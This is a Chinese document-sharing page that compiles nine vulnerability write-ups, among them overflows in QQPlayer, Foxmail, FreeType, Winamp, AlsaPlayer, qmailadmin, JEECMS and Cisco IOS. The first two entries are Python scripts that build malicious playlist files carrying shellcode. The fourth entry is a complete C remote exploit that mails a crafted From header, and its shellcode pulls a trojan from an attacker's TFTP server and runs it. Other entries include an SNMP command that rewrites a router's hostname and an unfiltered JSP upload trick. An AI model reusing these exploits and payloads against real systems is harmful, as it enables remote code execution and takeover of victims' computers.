当前位置：首页 > 实用文档 > 其他范文> QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警

QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警

时间：2022-12-20 07:53:11 其他范文收藏本文下载本文

QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警（共10篇）由网友“fjmxad”投稿提供，以下是小编精心整理的QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警，希望对大家有所帮助。

篇1：QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警

#################################################################

# Title: QQPlayer asx File Processing Buffer Overflow Exploit

# Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University

# Vendor: www.qq.com

# Platform. Windows XPSP3 Chinese Simplified

# Test: QQPlayer 2.3.696.400

# Vulnerable: QQPlayer<=2.3.696.400p1

#################################################################

# Code :

head =''''''

junk = “A” * 1975

nseh =“\x42\x61\x21\x61”

seh =“\xa9\x9e\x41\x00”

adjust=“\x30\x83\xc0\x0c”

shellcode=(“PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV”

“QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL”

“KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9”

“QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW”

“TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R”

“HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA”)

junk_=“R”*8000

foot =''''''_playlis.wma“/>

''''''

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open(”poc.asx“,”w“)

fobj.write(payload)

fobj.close

篇2：QQPlayer CUE文件缓冲区溢出漏洞漏洞预警

#!/usr/bin/env python

#################################################################

# Title: QQPlayer cue File Buffer Overflow Exploit

# Author: Lufeng Li of Neusoft Corporation

# Vendor: www.qq.com

# Platform. Windows XPSP3 Chinese Simplified

# Tested: QQPlayer 2.3.696.400

# Vulnerable: QQPlayer<=2.3.696.400p1

#################################################################

# Code :

head = ''''''FILE ”''''''

junk = “A” * 780

nseh =“\x42\x61\x21\x61”

seh =“\xa9\x9e\x41\x00”

adjust=“\x32\x42\x61\x33\xca\x83\xc0\x10”

shellcode=(“hffffk4diFkTpj02Tpk0T0AuEE2C4s4o0t0w174t0c7L0T0V7L2z1l131o2q1k2D1l081o”

“0v1o0a7O2r0T3w3e1P0a7o0a3Y3K0l3w038N5L0c5p8K354q2j8N5O00PYVTX10X41PZ41”

“H4A4I1TA71TADVTZ32PZNBFZDQC02DQD0D13DJE2C5CJO1E0G1I4T1R2M0T1V7L1TKL2CK”

“NK0KN2EKL08KN1FKO1Q7LML2N3W46607K7N684H310I9W025DOL1S905A4D802Z5DOO01”)

junk_=“R”*8000

foot =''''''.avi“ VIDEO''''''+”\x0a“''''''TRACK 02 MODE1/8888''''''+”\x0a“+”INDEX 08 08:08:08“

payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

fobj = open(”poc.cue“,”w“)

fobj.write(payload)

fobj.close()

篇3：FreeType LWFN文件处理远程缓冲区溢出漏洞

受影响系统：

FreeType FreeType < 2.2.1

不受影响系统：

FreeType FreeType 2.2.1

描述：

--------------------------------------------------------------------------------

BUGTRAQ ID: 18034

CVE(CAN) ID: CVE--1861,CVE-2006-3467

FreeType是一个流行的字体函数库，

FreeType在处理PCF字体时存在整数溢出，远程攻击者可能利用此漏洞在用户机器上执行任意指令。

如果用户受骗使用链接到FreeType的应用程序加载了特制的字体文件的话，就会导致拒绝服务或执行任意代码。

<*来源：Chris Evans （chris@ferret.lmh.ox.ac.uk）

链接：secunia.com/advisories/22907/

www.debian.org/security//dsa-1193

www.debian.org/security/2005/dsa-1178

www.auscert.org.au/render.html?it=6500

lwn.net/Alerts/196519

lwn.net/Alerts/196520

ftp://patches.sgi.com/support/free/security/advisories/20060701-01-U.asc

sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102714-1

建议：

--------------------------------------------------------------------------------

厂商补丁：

Debian

------

Debian已经为此发布了一个安全公告（DSA-1178-1）以及相应补丁:

DSA-1178-1：New freetype packages fix execution of arbitrary code

链接：www.debian.org/security/2005/dsa-1178

补丁下载：

Source archives:

security.debian.org/pool/updates/main/f/freetype/freetype_2.1.7-6.dsc

Size/MD5 checksum: 754 76dbe18b57a53fac328a1f8e00f54bd0

security.debian.org/pool/updates/main/f/freetype/freetype_2.1.7-6.diff.gz

Size/MD5 checksum: 57568 860e9383bba7d853ce6f758c239e89ed

security.debian.org/pool/updates/main/f/freetype/freetype_2.1.7.orig.tar.gz

Size/MD5 checksum: 1245623 991ff86e88b075ba363e876f4ea58680

Alpha architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_alpha.deb

Size/MD5 checksum: 88180 697811d9160b950b3d73682701f14e3c

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_alpha.deb

Size/MD5 checksum: 422838 635b31efebdb8fb192f7ee717a5e79f1

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_alpha.deb

Size/MD5 checksum: 784368 3d90ddefa034bae14101e1f9057efda7

AMD64 architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_amd64.deb

Size/MD5 checksum: 76242 73b70a41effc140791d6b58cf8d3a103

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_amd64.deb

Size/MD5 checksum: 390236 6b1c46c525b13bf78e6aa6adfe876300

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_amd64.deb

Size/MD5 checksum: 723742 e8cfab359664bd05c9606e21b632c9d6

ARM architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_arm.deb

Size/MD5 checksum: 58734 5535bb49abfbdb3a9add023c2f21fe07

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_arm.deb

Size/MD5 checksum: 352880 7dcc3438f6e69b8956244f3946038897

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_arm.deb

Size/MD5 checksum: 714518 6cae07f317c33b3f2f5de4e6209b3154

HP Precision architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_hppa.deb

Size/MD5 checksum: 80772 94c00e9be0020ec69779bb2961dedcc2

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_hppa.deb

Size/MD5 checksum: 407420 32967b0b193f09fdbfcf1a0f55cff736

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_hppa.deb

Size/MD5 checksum: 734434 7cb208545154507cf3462af986575e35

Intel IA-32 architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_i386.deb

Size/MD5 checksum: 63190 5c65822f534a53c3f88c72cc32253f37

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_i386.deb

Size/MD5 checksum: 364858 555ba61fec5d41a3759f08bc330b9dff

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_i386.deb

Size/MD5 checksum: 695074 81249aa29df653e228162b59f55da8a3

Intel IA-64 architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_ia64.deb

Size/MD5 checksum: 102616 8cfcca90b20054ab717d669c1109166c

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_ia64.deb

Size/MD5 checksum: 493792 eea2110b00ae876e0621365278628865

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_ia64.deb

Size/MD5 checksum: 844018 2351fd3f7be66cea09bb68ae99407805

Motorola 680x0 architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_m68k.deb

Size/MD5 checksum: 43862 a0ad63b48cef0fcd6d620e9eea56dcfd

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_m68k.deb

Size/MD5 checksum: 359672 e66cdcceff0149866934d8330a10be7f

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_m68k.deb

Size/MD5 checksum: 678786 2c12367dd397823d71c58ecc4db0f4a5

Big endian MIPS architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_mips.deb

Size/MD5 checksum: 91804 d14ecf530fa28216f71937d98baaaab6

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_mips.deb

Size/MD5 checksum: 384572 5dde54f093153caa592e20757e478199

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_mips.deb

Size/MD5 checksum: 742438 d0bcd379d23db5f38f7718f4337d3227

Little endian MIPS architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_mipsel.deb

Size/MD5 checksum: 91522 9c36563692b17dcfc1a98c3e8d7e97ab

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_mipsel.deb

Size/MD5 checksum: 376512 ceed1298a93acb941d3c0af2c282764e

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_mipsel.deb

Size/MD5 checksum: 735774 fd948760267718e195c78dd2e24215f2

PowerPC architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_powerpc.deb

Size/MD5 checksum: 81976 8fcc45ef341f6c9eb0e62f0b33f0b00a

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_powerpc.deb

Size/MD5 checksum: 379578 eaf219ba8b48fcce91c5118188c0b418

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_powerpc.deb

Size/MD5 checksum: 730094 a6d4471fdd1f7ad1f5f625b35d1f79ed

IBM S/390 architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_s390.deb

Size/MD5 checksum: 76228 ac7a5773d28f83d09d0e0918916e8ddf

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_s390.deb

Size/MD5 checksum: 400188 d93224537dea195ad6d642d6b1bd0cfd

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_s390.deb

Size/MD5 checksum: 752482 ca8df04a75ef0a814b5cad469b9ad024

Sun Sparc architecture:

security.debian.org/pool/updates/main/f/freetype/freetype2-demos_2.1.7-6_sparc.deb

Size/MD5 checksum: 68420 1cd0b5cc3fcb62ac0ef639467fba9ebc

security.debian.org/pool/updates/main/f/freetype/libfreetype6_2.1.7-6_sparc.deb

Size/MD5 checksum: 364098 95e28187528ecd25b87a6ad7475c056b

security.debian.org/pool/updates/main/f/freetype/libfreetype6-dev_2.1.7-6_sparc.deb

Size/MD5 checksum: 699966 8cf12c5209c6ff1d703166a638e5775d

补丁安装方法：

1. 手工安装补丁包：

首先，使用下面的命令来下载补丁软件：

# wget url (url是补丁下载链接地址)

然后，使用下面的命令来安装补丁：

# dpkg -i file.deb (file是相应的补丁名)

2. 使用apt-get自动安装补丁包：

首先，使用下面的命令更新内部数据库：

# apt-get update

然后，使用下面的命令安装更新软件包：

# apt-get upgrade

RedHat

------

RedHat已经为此发布了一个安全公告（RHSA-2006:0635-01）以及相应补丁:

RHSA-2006:0635-01：Important: XFree86 security update

链接：lwn.net/Alerts/196520

SGI

---

SGI已经为此发布了一个安全公告（20060701-01-U）以及相应补丁:

20060701-01-U：SGI Advanced Linux Environment 3 Security Update #60

链接：ftp://patches.sgi.com/support/free/security/advisories/20060701-01-U.asc

Sun

---

Sun已经为此发布了一个安全公告（Sun-Alert-102714）以及相应补丁:

Sun-Alert-102714：Security Vulnerability With Integer Multiplication Within libXfont Affects Solaris X11 Servers

链接：sunsolve.sun.com/search/printfriendly.do?assetkey=1-26-102714-1

FreeType

--------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

prdownloads.sourceforge.net/freetype/freetype-2.2.1.tar.bz2?download

篇4：Foxmail 5远程缓冲区溢出漏洞漏洞预警

注：本文是2月xfocus成员在内部技术交流中提出的，在此之前，启明星辰技术人员已经发现这一漏洞，但未公开细节，xfocus成员听说存在这一漏洞后对Foxmail进行分析，并写出利用代码，

测试环境：win2k sp4+foxmail 5.0.300

以前测试foxmail 4.x的时候曾经发现过溢出漏洞，不过后来一直没时间研究就先放下了，后来听说Foxmail5也有溢出，但是一直没有看见公布。于是没事的时候干脆自己研究一下，测试后发现以前的溢出漏洞已经补上了，不过出了一个新的漏洞。

问题出在PunyLib.dll里面的UrlToLocal函数，估计这是一个用来处理垃圾邮件的链接库，当一封邮件被判定为垃圾邮件时，就会调用UrlToLocal来处理邮件体的“From: ”字段，处理过程中发生堆栈溢出，可以导致执行任意代码。

具体处理过程如下：

.text:10002040 public UrlToLocal

.text:10002040 UrlToLocal proc near

.text:10002040

.text:10002040 arg_0 = dword ptr 4

.text:10002040 arg_4 = dword ptr 8

.text:10002040

.text:10002040 mov eax, dword_1000804C

.text:10002045 mov ecx, dword_10008030

.text:1000204B mov edx, [esp+arg_4]

.text:1000204F push offset aHttp ; ”“

.text:10002054 push eax

.text:10002055 mov eax, [esp+8+arg_0]

.text:10002059 push offset unk_10008034

.text:1000205E push ecx

.text:1000205F push edx

.text:10002060 push eax

.text:10002061 call sub_10002070 ;调用10002070，其中参数里保存的是邮件体的“From: ”字段后面的内容

.text:10002070 sub_10002070 proc near ; CODE XREF: UrlToLocal+21p

.text:10002070 ; EmailAdrToLocal+107p

.text:10002070

.text:10002070 var_600 = dword ptr -600h

.text:10002070 var_500 = dword ptr -500h

.text:10002070 var_400 = dword ptr -400h

.text:10002070 var_300 = dword ptr -300h

.text:10002070 var_200 = dword ptr -200h

.text:10002070 var_100 = dword ptr -100h

.text:10002070 arg_0 = dword ptr 4

.text:10002070 arg_4 = dword ptr 8

.text:10002070 arg_8 = dword ptr 0Ch

.text:10002070 arg_C = dword ptr 10h

.text:10002070 arg_10 = dword ptr 14h

.text:10002070 arg_14 = dword ptr 18h

.text:10002070

.text:10002070 mov edx, [esp+arg_0]

.text:10002074 sub esp, 600h

......

.text:100020DF push eax

.text:100020E0 push ecx

.text:100020E1 push ebx

.text:100020E2 call sub_10001A30 ;调用10001A30，就是这个函数里面溢出了

.text:10001A30 sub_10001A30 proc near ; CODE XREF: sub_10002070+72p

.text:10001A30 ; sub_10002290+95p

.text:10001A30

.text:10001A30 var_104 = dword ptr -104h

.text:10001A30 var_100 = dword ptr -100h

.text:10001A30 arg_0 = dword ptr 4

.text:10001A30 arg_4 = dword ptr 8

.text:10001A30 arg_8 = dword ptr 0Ch

.text:10001A30 arg_C = dword ptr 10h

.text:10001A30 arg_10 = dword ptr 14h

.text:10001A30 arg_14 = dword ptr 18h

.text:10001A30

.text:10001A30 sub esp, 104h ;分配0x104字节大小的堆栈，但是拷贝的“From: ”字段最大为0x200

.text:10001A36 push ebx

.text:10001A37 mov ebx, [esp+108h+arg_0]

.text:10001A3E push ebp

.text:10001A3F mov ebp, [esp+10Ch+arg_10]

.text:10001A46 push esi

.text:10001A47 xor esi, esi

......

.text:10001AA9 sub edi, ecx

.text:10001AAB mov eax, ecx

.text:10001AAD mov esi, edi

.text:10001AAF mov edi, edx

.text:10001AB1 shr ecx, 2

.text:10001AB4 rep movsd ;这里进行内存拷贝的时候溢出了，按照“From: ”字段大小拷贝到0x104的缓冲区里

.text:10001AB6 mov ecx, eax

.text:10001AB8 and ecx, 3

.text:10001ABB rep movsb

......

.text:10001AE7 mov edi, [esp+114h+arg_C]

.text:10001AEE shr ecx, 2

.text:10001AF1 rep movsd ;这里有几处地方会对局部变量进行操作，因为这些变量都被覆盖了，所以需要把他们覆盖成可以写的地址，我覆盖的是0x7ffdf220这个地址，应该是PEB的区域，所以必须在后面shellcode里面把这个区域的内容恢复成0

.text:10001AF3 mov ecx, eax

.text:10001AF5 and ecx, 3

.text:10001AF8 rep movsb

......

.text:10001BD7 pop edi

.text:10001BD8 pop esi

.text:10001BD9 pop ebp

.text:10001BDA pop ebx

.text:10001BDB add esp, 104h

.text:10001BE1 retn ;返回的时候就会回到我们的JMP ESP地址去

这个溢出无法覆盖SEH，而且字符串里面不能包含“@,(,,,\r,\n”这些乱七八糟的字符。shellcode用的是ey4s写的用URLMON下载并运行exe文件的那个。

有些MAIL服务器会把shellcode截断，所以我又改了一下，用比较短的shellcode直接运行tftp来下载程序并运行，测试了一下成功率比原来有所提高，但是容易被防火墙给拦截下来。

/* fmx.c - x86/win32 Foxmail 5.0 PunyLib.dll remote stack buffer overflow exploit

* (C) COPYRIGHT XFOCUS Security Team,

* This is unpublished proprietary source code of XFOCUS Security Team.

* It should not be distributed in any form. without express permission

* from XFOCUS Security Team.

* -----------------------------------------------------------------------

* Author : xfocus

* : www.xfocus.org

* Maintain : XFOCUS Security Team

* Version : 0.2

* Test : Windows server GB/XP professional

* + Foxmail 5.0.300.0

* Notes : unpublished vul.

* Greets : ey4s, and all member of XFOCUS Security Team.

* Complie : cl fmx.c

* Usage : fmx

* mail_addr: email address we wantto hack

* tftp_server: run a tftp server and have a a.exe trojan

* smtp_server: SMTP server don't need login, we send the email thru it

* Date : 2004-02-27

* Revised : 2004-03-05

* Revise History:

* -03-05 call WinExec addr of Foxmail.exe module to run tftp for down&execute

#include

#pragma comment (lib,”ws2_32“)

//mail body, it's based on a real spam email, heh

unsigned char packet[] =

”From: %s\r\n“ //buffer to overrun

”Subject: Hi,man\r\n“

”MIME-Version: 1.0\r\n“

”Content-Type: multipart/mixed; boundary=\“87122827\”\r\n“

”\r\n“

”--87122827\r\n“

”Content-Type: text/plain; charset=us-ascii\r\n“

”Content-Transfer-Encoding: 7bit\r\n“

”\r\n“

”T\r\n“

”\r\n“

”--87122827\r\n“

”Content-Disposition: attachment\r\n“

”Content-Type: Text/HTML;\r\n“

” name=\“girl.htm\”\r\n“

”Content-Transfer-Encoding: 7bit\r\n“

”\r\n“

”--87122827--\r\n“

”\r\n“

”.\r\n“;

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.300)

unsigned char winexec[] =

”\x83\xec\x50\xeb\x0c\xb9\x41\x10\xd3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff“;

//tiny shellcode to run WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

unsigned char winexec2[] =

”\x83\xec\x50\xeb\x0c\xb9\x41\x10\xa3\x5d\xc1\xe9\x08\xff\x11\xeb\x08\x33\xdb\x53\xe8\xec\xff\xff\xff“;

#define SMTPPORT 25

int Make_Connection(char *address,int port,int timeout);

int SendXMail(char *mailaddr, char *tftp, char *smtpserver, char *shellcode);

int main(int argc, char * argv[])

{

WSADATA WSAData;

char *mailaddr = NULL;

char *tftp = NULL;

char *smtpserver = NULL;

if(argc!=4)

{

printf(”Usage: %s \ne.g.:%s eeye@hack.com 202.2.3.4 219.3.2.1\n“, argv[0], argv[0]);

return 1;

}

mailaddr=argv[1];

tftp=argv[2];

smtpserver=argv[3];

if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)

{

printf(”WSAStartup failed.\n“);

WSACleanup();

exit(1);

}

//WinExec() address

SendXMail(mailaddr, tftp, smtpserver, winexec); //WinExec() address in Foxmail.exe module(foxmail 5.0.300)

SendXMail(mailaddr, tftp, smtpserver, winexec2); //WinExec() address in Foxmail.exe module(foxmail 5.0.210 BETA2)

WSACleanup();

return 0;

}

// 建立TCP连接

// 输入:

// char * address IP地址

// int port 端口

// int timeout 延时

// 输出:

// 返回:

// 成功 >0

// 错误 <=0

int Make_Connection(char *address,int port,int timeout)

{

struct sockaddr_in target;

SOCKET s;

int i;

DWORD bf;

fd_set wd;

struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);

if(s<0)

return -1;

target.sin_family = AF_INET;

target.sin_addr.s_addr = inet_addr(address);

if(target.sin_addr.s_addr==0)

{

closesocket(s);

return -2;

}

target.sin_port = htons(port);

bf = 1;

ioctlsocket(s,FIONBIO,&bf);

tv.tv_sec = timeout;

tv.tv_usec = 0;

FD_ZERO(&wd);

FD_SET(s,&wd);

connect(s,(struct sockaddr *)&target,sizeof(target));

if((i=select(s+1,0,&wd,0,&tv))==(-1))

{

closesocket(s);

return -3;

}

if(i==0)

{

closesocket(s);

return -4;

}

i = sizeof(int);

getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);

if((bf!=0)||(i!=sizeof(int)))

{

closesocket(s);

return -5;

}

ioctlsocket(s,FIONBIO,&bf);

return s;

}

//send magic mail

int SendXMail( char *mailaddr, char *tftp, char *smtpserver, char *shellcode)

{

SOCKET csock;

int ret,i=0;

char buf[510], sbuf[0x10000], tmp[500], tmp1[500];

csock = Make_Connection(smtpserver, SMTPPORT, 10);

if(csock<0)

{

printf(”connect err.\n“);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(”recv err.\n“);

exit(1);

}

printf(buf);

ret=send(csock, ”HELO server\r\n“,strlen(”HELO server\r\n“), 0);

if(ret<=0)

{

printf(”send err.\n“);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(”recv err.\n“);

exit(1);

}

printf(buf);

ret=send(csock, ”MAIL FROM: info@sina.com\r\n“,strlen(”MAIL FROM: info@sina.com\r\n“), 0);

if(ret<=0)

{

printf(”send err.\n“);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(”recv err.\n“);

exit(1);

}

printf(buf);

sprintf(tmp, ”RCPT TO: %s\r\n“, mailaddr);

ret=send(csock, tmp,strlen(tmp), 0);

if(ret<=0)

{

printf(”send err.\n“);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(”recv err.\n“);

exit(1);

}

printf(buf);

Sleep(1000);

ret=send(csock, ”DATA\r\n“,strlen(”DATA\r\n“), 0);

if(ret<=0)

{

printf(”send err.\n“);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(”recv err.\n“);

exit(1);

}

printf(buf);

printf(”send exploit mail...\n“);

memset(sbuf, 0, sizeof(sbuf));

memset(buf, 0, sizeof(buf));

memset(buf, 0x41, sizeof(buf)-1);

memset(tmp, 0, sizeof(tmp));

//strcpy(tmp, winexec);//WinExec() address in Foxmail.exe module(foxmail 5.0.300)

strcpy(tmp, shellcode);//WinExec() address in Foxmail.exe module

strcat(tmp, ”cmd /c tftp -i %s get a.exe&a.exe:“);

sprintf(tmp1, tmp, tftp);

memcpy(buf+0x100-strlen(tmp1), tmp1, strlen(tmp1));

*(int *)(buf+0x100)=0x7ffa54cd; //ret addr jmp esp

*(int *)(buf+0x104)=0x80eb80eb; //jmp back

*(int *)(buf+0x108)=0x7ffdf220; //writeable addr

*(int *)(buf+0x110)=0x7ffdf220; //writeable addr

memcpy(buf, ”girl\x0d“, 5);

sprintf(sbuf, (char *)packet, buf);

ret=send(csock, sbuf,strlen(sbuf), 0);

if(ret<=0)

{

printf(”send err.\n“);

exit(1);

}

memset(buf, 0, sizeof(buf));

ret=recv(csock, buf, 4096, 0);

if(ret<=0)

{

printf(”recv err.\n“);

exit(1);

}

printf(buf);

printf(”exploit mail sent.\n“);

closesocket(csock);

return 0;

}

安全焦点

篇5：Winamp skin.xml皮肤文件处理缓冲区的溢出漏洞

受影响系统：

Nullsoft Winamp 5.541

描述：

BUGTRAQ ID: 34009

Winamp是一款流行的媒体播放器，支持多种文件格式，

如果Winamp受骗加载了恶意的皮肤文件的话，就可能触发缓冲区溢出，导致在用户系统上执行任意代码，

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！ milw0rm.com/exploits/8158

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

www.winamp.com/

篇6：qmailadmin “pathinfo” 处理缓冲区溢出的漏洞其他漏洞

受影响系统：inter7 qmailadmin <= 1.2.9不受影响系统：inter7 qmailadmin 1.2.10描述：

qmailadmin是一款由inter7组织开发的qmail cgi形式管理程序，

qmailadmin的qmailadmin.c在处理path_info环境变量时存在边界条件错误，攻击者可以通过特制的url请求触发缓冲区溢出，导致拒绝服务，

补丁下载：

www.inter7.com/index.php?page=qmailadmin

关键字：其他漏洞

篇7：AlsaPlayer 存在处理远程缓冲区溢出漏洞

受影响系统： Alsaplayer Alsaplayer 0.99.80-rc2 Alsaplayer Alsaplayer 0.99.76 Alsaplayer Alsaplayer 0.99.71 不受影响系统： Alsaplayer Alsaplayer 0.99.80-rc3 描述： -------------------------------------------------------------------------------- BUGTRAQ ID: 25969 AlsaPlayer是一个为ALSA声音系统编写的PCM 播放器，也支持OSS、NAS 和ESD，

AlsaPlayer 存在处理远程缓冲区溢出漏洞

， AlsaPlayer在处理畸形格式的OGG文件时存在漏洞，远程攻击者可能利用此漏洞控制用户系统。 AlsaPlayer中的vorbis输入插件没有正确地处理.OGG文件，如果用户受骗打开了带有超长标注的特制.OGG文件的话，就可能触发缓冲区溢出，导致执行任意指令。 <*来源：Erik Sjölund 链接：sourceforge.net/project/shownotes.php?release_id=544663&group_id=249 secunia.com/advisories/27117/ *>建议： -------------------------------------------------------------------------------- 厂商补丁： Alsaplayer ---------- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： downloads.sourceforge.net/alsaplayer/alsaplayer-0.99.80-rc4.tar.gz

篇8：JEECMS漏洞（文件上传）漏洞预警

漏洞描述：这个漏洞很简单，上传没有过滤，注册账号之后去上传头像，jsp 都可以，会提示上传类型错误，弹出对话框，不用管它，关闭弹窗，点击右键查看源代码，你的代码已经上传上了，

JEECMS最新漏洞（文件上传）漏洞预警

，

上传后的格式为：

www.xxx.com/online/upload/M000000070500007/1349769169860.jsp?o=vLogin

篇9：IOS LPD远程缓冲区溢出漏洞

Cisco IOS的LPD服务在处理超长的设备名时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制设备或导致设备拒绝服务，行式打印机服务（LPD）用于在Cisco IOS中提供打印服务。如果IOS中配置了LPD守护程序的话，该服务会监听于默认的LPD端口TCP 515。如果任何非515的源TCP端口进行连接时，就会显示以下错误：

$ telnet 172.30.3.101 515

Trying 172.30.3.101...

Connected to 172.30.3.101 (172.30.3.101).

Escape character is '^]'.

hostname_of_the_router: /usr/lib/lpd: Malformed from address

如果主机名大于等于99个字符的话，就会由于调用sprintf函数而导致溢出，

尽管技术上是栈溢出，但由于IOS为进程栈分配堆内存，因此所覆盖的内存实际为堆。由于堆内存用作了栈，在出现溢出时主机名可以覆盖存储在字符缓冲区开始之前的返回地址，但由于某些原因在缓冲区到达堆块边界处的red zone之前不会出现崩溃，因此在出现崩溃和路由器重启后，内存dump显示的是堆破坏。

必须要控制主机名才能利用这个漏洞。如果设备上在运行SNMP且知道rw团体字符串（通常为默认值private），就可以如下设置主机名：

$ snmpset -Os -c private -v 1 10.0.0.1 system.sysName.0 s long_hostname

建议：

临时解决方法：

* 使用no printer命令禁用LPD服务。